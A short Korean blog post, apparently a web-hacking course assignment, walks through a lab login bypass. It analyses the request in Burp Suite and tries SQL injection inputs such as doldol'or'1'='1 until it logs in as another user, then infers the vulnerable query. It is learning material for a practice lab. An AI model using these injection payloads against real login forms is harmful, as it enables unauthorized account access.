Login Bypass 1 풀이

황인환·2024년 5월 19일

- 과제

Login Bypass 1번 normaltic1로 접속하기
ID: doldol PW: dol1234가 주어졌다.

1. Burp Suite로 패킷 분석 확인

-> 주어진 ID PW 활용
-> POST방식, cookie 인증x

2. 'and'1'='1입력

ID: doldol'and'1'='1
PW: dol1234(doldol에 맞는 비밀번호)
-> WHERE id = ''이외 괄호 있는지 체크
-> 로그인 성공 괄호x

3. 주석입력 '#

ID: doldol'#
PW:1(아무거나)
-> 로그인 실패
-> 식별인증 분리의심 & 개행의심

4. 'or'1'='1입력

ID: doldol'or'1'='1
PW: 1(아무거나)
-> 로그인 성공
-> 식별인증동시 및 개행구문으로 생각

5. normaltic1대입

ID: normaltic1'or'1'='1
PW: 1(아무거나)

성공

6. 예상 sql코드

식별인증동시, 개행구문

$sql="SELECT * FROM users WHERE id='$id' (/n :개행)
and password='$password'";

--normaltic 5주차 과제--

0개의 댓글